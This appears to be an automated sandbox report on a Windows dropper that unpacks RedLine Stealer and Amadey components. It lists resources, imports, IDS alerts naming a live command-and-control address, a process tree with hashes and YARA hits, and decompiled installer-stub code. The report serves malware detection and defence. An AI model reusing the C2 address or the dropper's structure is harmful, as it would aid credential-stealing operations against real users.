| RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States |
| RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States |
| RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States |
| RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States |
| RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States |
| RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia |
| RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States |
| RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia |
| RT_DIALOG | 0x250f4 | 0x166 | data | English | United States |
| RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia |
| RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States |
| RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia |
| RT_DIALOG | 0x25764 | 0x130 | data | English | United States |
| RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia |
| RT_DIALOG | 0x259e4 | 0x120 | data | English | United States |
| RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia |
| RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States |
| RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia |
| RT_STRING | 0x25d3c | 0x520 | data | English | United States |
| RT_STRING | 0x2625c | 0x52e | data | Russian | Russia |
| RT_STRING | 0x2678c | 0x5cc | data | English | United States |
| RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia |
| RT_STRING | 0x272ec | 0x4b0 | data | English | United States |
| RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia |
| RT_STRING | 0x27c50 | 0x44a | data | English | United States |
| RT_STRING | 0x2809c | 0x43e | data | Russian | Russia |
| RT_STRING | 0x284dc | 0x3ce | data | English | United States |
| RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia |
| RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0x28bb0 | 0xc6828 | Microsoft Cabinet archive data, many, 813096 bytes, 2 files, at 0x2c +A "gck46uD.exe" +A "fcC6215.exe", ID 1810, number 1, 31 datablocks, 0x1503 compression | English | United States |
| RT_RCDATA | 0xef3d8 | 0x4 | data | English | United States |
| RT_RCDATA | 0xef3dc | 0x24 | data | English | United States |
| RT_RCDATA | 0xef400 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xef408 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xef410 | 0x4 | data | English | United States |
| RT_RCDATA | 0xef414 | 0xc | data | English | United States |
| RT_RCDATA | 0xef420 | 0x4 | data | English | United States |
| RT_RCDATA | 0xef424 | 0xc | data | English | United States |
| RT_RCDATA | 0xef430 | 0x4 | data | English | United States |
| RT_RCDATA | 0xef434 | 0x6 | data | English | United States |
| RT_RCDATA | 0xef43c | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xef444 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_GROUP_ICON | 0xef44c | 0xbc | data | English | United States |
| RT_VERSION | 0xef508 | 0x408 | data | English | United States |
| RT_VERSION | 0xef910 | 0x410 | data | Russian | Russia |
| RT_MANIFEST | 0xefd20 | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States |

| DLL | Import |
|---|---|
| ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges |
| KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA |
| GDI32.dll | GetDeviceCaps |
| USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics |
| msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset |
| COMCTL32.dll | |
| Cabinet.dll | |
| VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA |
Language of compilation system | Country where language is spoken
English | United States
Russian | Russia
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/15/23-21:48:41.150000 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 4136 | 49702 | 193.233.20.13 | 192.168.2.3
02/15/23-21:48:39.233243 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49702 | 4136 | 192.168.2.3 | 193.233.20.13
02/15/23-21:48:58.203132 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49702 | 4136 | 192.168.2.3 | 193.233.20.13


Target ID: 0
Start time: 21:48:09
Start date: 15/02/2023
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\file.exe
Imagebase: 0x50000
File size: 969728 bytes
MD5 hash: 33F01DC275FFA0C5989F8630EB4279B5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 1
Start time: 21:48:09
Start date: 15/02/2023
Path: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
Imagebase: 0x20000
File size: 742912 bytes
MD5 hash: 4C0E7D70D851B36C6338565474276043
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.250210360.00000000048F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low

                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                              Start time:21:48:09
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                              File size:551936 bytes
                                                                                                                                                                                                                                              MD5 hash:57EB0A896C2D871FDCCB5F4A5765F84D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:21:48:10
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                                                                                                                                                                                                                                              Imagebase:0x10e0000
                                                                                                                                                                                                                                              File size:206848 bytes
                                                                                                                                                                                                                                              MD5 hash:169FAA6C3CA7D213D20BDC00810116B8
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:21:48:11
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe
                                                                                                                                                                                                                                              Imagebase:0xf20000
                                                                                                                                                                                                                                              File size:11264 bytes
                                                                                                                                                                                                                                              MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:21:48:18
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                              Imagebase:0x7ff7d8f80000
                                                                                                                                                                                                                                              File size:69632 bytes
                                                                                                                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:21:48:22
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe
                                                                                                                                                                                                                                              Imagebase:0x1e0000
                                                                                                                                                                                                                                              File size:179200 bytes
                                                                                                                                                                                                                                              MD5 hash:DD0C9E110C68CE1FA5308979EF718F7B
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.277000636.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, Author: ditekSHen
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                              Start time:21:48:27
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                              Imagebase:0x7ff7d8f80000
                                                                                                                                                                                                                                              File size:69632 bytes
                                                                                                                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:21:48:35
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                              Imagebase:0x7ff7d8f80000
                                                                                                                                                                                                                                              File size:69632 bytes
                                                                                                                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:21:48:44
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                              Imagebase:0x7ff7d8f80000
                                                                                                                                                                                                                                              File size:69632 bytes
                                                                                                                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:28.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:26.8%
                                                                                                                                                                                                                                                Total number of Nodes:960
                                                                                                                                                                                                                                                Total number of Limit Nodes:25
3233->3230 3234->3230 3236 51a7e 3235->3236 3237 56bef _XcptFilter 3238 57270 _except_handler4_common 3239 569b0 3240 569b5 3239->3240 3248 56fbe GetModuleHandleW 3240->3248 3242 569c1 __set_app_type __p__fmode __p__commode 3243 569f9 3242->3243 3244 56a02 __setusermatherr 3243->3244 3245 56a0e 3243->3245 3244->3245 3250 571ef _controlfp 3245->3250 3247 56a13 3249 56fcf 3248->3249 3249->3242 3250->3247 3251 534f0 3252 53504 3251->3252 3253 535b8 3251->3253 3252->3253 3254 535be GetDesktopWindow 3252->3254 3255 5351b 3252->3255 3256 53671 EndDialog 3253->3256 3257 53526 3253->3257 3258 543d0 11 API calls 3254->3258 3259 5354f 3255->3259 3260 5351f 3255->3260 3256->3257 3261 535d6 3258->3261 3259->3257 3263 53559 ResetEvent 3259->3263 3260->3257 3262 5352d TerminateThread EndDialog 3260->3262 3265 535e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3261->3265 3266 5361d SetWindowTextA CreateThread 3261->3266 3262->3257 3264 544b9 20 API calls 3263->3264 3267 53581 3264->3267 3265->3266 3266->3257 3268 53646 3266->3268 3269 5359b SetEvent 3267->3269 3271 5358a SetEvent 3267->3271 3270 544b9 20 API calls 3268->3270 3272 53680 4 API calls 3269->3272 3270->3253 3271->3257 3272->3253 3273 56ef0 3274 56f2d 3273->3274 3276 56f02 3273->3276 3275 56f27 ?terminate@ 3275->3274 3276->3274 3276->3275

Callgraph (legend: Executed, Not Executed; Opacity -> Relevance; Disassembly available)

Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00053BA2() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v280;
                                                                                                                                                                                                                                                				short _v300;
                                                                                                                                                                                                                                                				intOrPtr _v304;
                                                                                                                                                                                                                                                				void _v348;
                                                                                                                                                                                                                                                				char _v352;
                                                                                                                                                                                                                                                				intOrPtr _v356;
                                                                                                                                                                                                                                                				signed int _v360;
                                                                                                                                                                                                                                                				short _v364;
                                                                                                                                                                                                                                                				char* _v368;
                                                                                                                                                                                                                                                				intOrPtr _v372;
                                                                                                                                                                                                                                                				void* _v376;
                                                                                                                                                                                                                                                				intOrPtr _v380;
                                                                                                                                                                                                                                                				char _v384;
                                                                                                                                                                                                                                                				signed int _v388;
                                                                                                                                                                                                                                                				intOrPtr _v392;
                                                                                                                                                                                                                                                				signed int _v396;
                                                                                                                                                                                                                                                				signed int _v400;
                                                                                                                                                                                                                                                				signed int _v404;
                                                                                                                                                                                                                                                				void* _v408;
                                                                                                                                                                                                                                                				void* _v424;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                				signed int _t76;
                                                                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                                                                				signed int _t79;
                                                                                                                                                                                                                                                				short _t96;
                                                                                                                                                                                                                                                				signed int _t97;
                                                                                                                                                                                                                                                				intOrPtr _t98;
                                                                                                                                                                                                                                                				signed int _t101;
                                                                                                                                                                                                                                                				signed int _t104;
                                                                                                                                                                                                                                                				signed int _t108;
                                                                                                                                                                                                                                                				int _t112;
                                                                                                                                                                                                                                                				void* _t115;
                                                                                                                                                                                                                                                				signed char _t118;
                                                                                                                                                                                                                                                				void* _t125;
                                                                                                                                                                                                                                                				signed int _t127;
                                                                                                                                                                                                                                                				void* _t128;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                                				void* _t130;
                                                                                                                                                                                                                                                				short _t137;
                                                                                                                                                                                                                                                				char* _t140;
                                                                                                                                                                                                                                                				signed char _t144;
                                                                                                                                                                                                                                                				signed char _t145;
                                                                                                                                                                                                                                                				signed int _t149;
                                                                                                                                                                                                                                                				void* _t150;
                                                                                                                                                                                                                                                				void* _t151;
                                                                                                                                                                                                                                                				signed int _t153;
                                                                                                                                                                                                                                                				void* _t155;
                                                                                                                                                                                                                                                				void* _t156;
                                                                                                                                                                                                                                                				signed int _t157;
                                                                                                                                                                                                                                                				signed int _t162;
                                                                                                                                                                                                                                                				signed int _t164;
                                                                                                                                                                                                                                                				void* _t165;
                                                                                                                                                                                                                                                
				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x58004; // 0x5a679bd9
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x59124 =  *0x59124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x58a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x58c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0005468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E000544B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x59124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00051AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00056CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00053FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x58580;
													if( *0x58580 != 0) {
														E00052267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x58180;
											if( *0x58180 == 0) {
												_t146 = 0x4c7;
												E000544B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x59124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x59a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00056495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E000544B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x59124 = E00056285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
                                                                                                                                                                                                                                                												_t146 = 0x4c9;
                                                                                                                                                                                                                                                												__eflags = 0;
                                                                                                                                                                                                                                                												E000544B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                                												FreeLibrary(_t129);
                                                                                                                                                                                                                                                												goto L65;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags =  *0x58a30;
                                                                                                                                                                                                                                                											_t151 = _v408;
                                                                                                                                                                                                                                                											_v384 = 0;
                                                                                                                                                                                                                                                											_v368 =  &_v280;
                                                                                                                                                                                                                                                											_t96 =  *0x59a40; // 0x3
                                                                                                                                                                                                                                                											_v364 = _t96;
                                                                                                                                                                                                                                                											_t97 =  *0x58a38 & 0x0000ffff;
                                                                                                                                                                                                                                                											_v380 = 0x59154;
                                                                                                                                                                                                                                                											_v376 = _t151;
                                                                                                                                                                                                                                                											_v372 = 0x591e4;
                                                                                                                                                                                                                                                											_v360 = _t97;
                                                                                                                                                                                                                                                											if( *0x58a30 != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t144 =  *0x59a34; // 0x1
                                                                                                                                                                                                                                                											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                                											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                                											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t145 =  *0x58d48; // 0x0
                                                                                                                                                                                                                                                											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                                											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                                												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                                												__eflags = _t97;
                                                                                                                                                                                                                                                												_v360 = _t97;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t145;
                                                                                                                                                                                                                                                											if(_t145 < 0) {
                                                                                                                                                                                                                                                												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                                												__eflags = _t104;
                                                                                                                                                                                                                                                												_v360 = _t104;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t98 =  *0x59a38; // 0x0
                                                                                                                                                                                                                                                											_v356 = _t98;
                                                                                                                                                                                                                                                											_t130 = _t146;
                                                                                                                                                                                                                                                											 *0x5a288( &_v384);
                                                                                                                                                                                                                                                											_t101 = _v404();
                                                                                                                                                                                                                                                											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                                											if(_t164 != _t164) {
                                                                                                                                                                                                                                                												_t130 = 4;
                                                                                                                                                                                                                                                												asm("int 0x29");
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											 *0x59124 = _t101;
                                                                                                                                                                                                                                                											_push(_t129);
                                                                                                                                                                                                                                                											__eflags = _t101;
                                                                                                                                                                                                                                                											if(_t101 < 0) {
                                                                                                                                                                                                                                                												FreeLibrary();
                                                                                                                                                                                                                                                												goto L61;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												FreeLibrary();
                                                                                                                                                                                                                                                												_t127 = _v400;
                                                                                                                                                                                                                                                												goto L58;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags =  *0x59a40 - 1; // 0x3
                                                                                                                                                                                                                                                										if(__eflags == 0) {
                                                                                                                                                                                                                                                											goto L37;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags =  *0x58a20;
                                                                                                                                                                                                                                                										if( *0x58a20 == 0) {
                                                                                                                                                                                                                                                											goto L37;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t157;
                                                                                                                                                                                                                                                										if(_t157 != 0) {
                                                                                                                                                                                                                                                											goto L38;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_v388 = 1;
                                                                                                                                                                                                                                                										E0005202A(_t146); // executed
                                                                                                                                                                                                                                                										goto L37;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t146 =  &_v280;
                                                                                                                                                                                                                                                									_t108 = E0005468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                                									__eflags = _t108;
                                                                                                                                                                                                                                                									if(_t108 == 0) {
                                                                                                                                                                                                                                                										goto L25;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									__eflags =  *0x58c42;
